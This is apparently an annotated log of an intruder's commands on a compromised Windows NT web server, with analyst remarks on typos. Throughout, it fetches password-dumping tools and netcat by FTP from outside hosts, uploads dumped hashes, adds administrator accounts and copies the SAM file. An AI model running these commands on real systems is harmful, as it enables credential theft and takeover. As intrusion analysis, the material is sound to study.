shell "cmd /c echo werd>>c:\fun" echo user johna2k>ftpcom echo hacker2000>>ftpcom echo get samdump.dll>>ftpcom echo get pdump.exe>>ftpcom echo get nc.exe>>ftpcom echo quit>>ftpcom ftp -s -ftpcom -n www.nether.net pdump.exe >>new.pass echo user johna2k>ftpcom2 echo hacker2000>>ftpcom2 put new.pass>>ftpcom2 (typo here, forgot the echo) echo quit>>ftpcom2 ftp -s -ftpcom2 -n www.nether.net ftp 213.116.251.162 echo open 213.116.251.162>ftpcom echo johna2k >ftpcom echo hacker2000>>ftpcom echo get samdump.dll>>ftpcom echo get pdump.exe >>ftpcom echo get nc.exe >>ftpcom echo quit >>ftpcom ftp -s -ftpcom open 212.139.12.26 (Hmm... freedu-12-26.libertysurf.se is new) echo johna2k>>sasfile echo haxedj00>>sasfile echo get pdump.exe>>sasfile echo get samdump.dll>>sasfile echo get nc.exe>>sasfile echo quit>>sasfile ftp -s -sasfile open 213.116.251.162 echo johna2k>>sasfile echo haxedj00>>sasfile echo get pdump.exe echo get samdump.dll>>sasfile echo get nc.exe>>sasfile echo quite>>sasfile ftp -s -sasfile c:\program files\system\msadc\pdump.exe>>yay.txt (typo? the space in program files needs to be quoted) c:\program files\common files\system\msadc\pdump.exe (typo? the space in program files needs to be quoted) pdump.exe>>c:\yay.txt net session >>yay2.txt net session >>c:\yay2.txt net users >>heh.txt net users >>c:\heh.txt net localgroup Domain Admins IWAM_KENNY /ADD net localgroup Domain Admins IUSR_KENNY /ADD net localgroup administrators IUSR_KENNY /ADD net localgroup administrators IWAM_KENNY /ADD net user testuser UgotHacked /ADD net localgroup Administrator testuser /ADD rdisk /s rdisk -s rdisk rdisk -s rdisk -s rdisk /s rdisk /s- rdisk /s- type c:\winnt\repair\sam._>>c:\har.txt del c:\inetpub\wwwroot\har.txt del c:\inetpub\wwwroot\har.txt net user IWAM_KENNY Snake69Snake69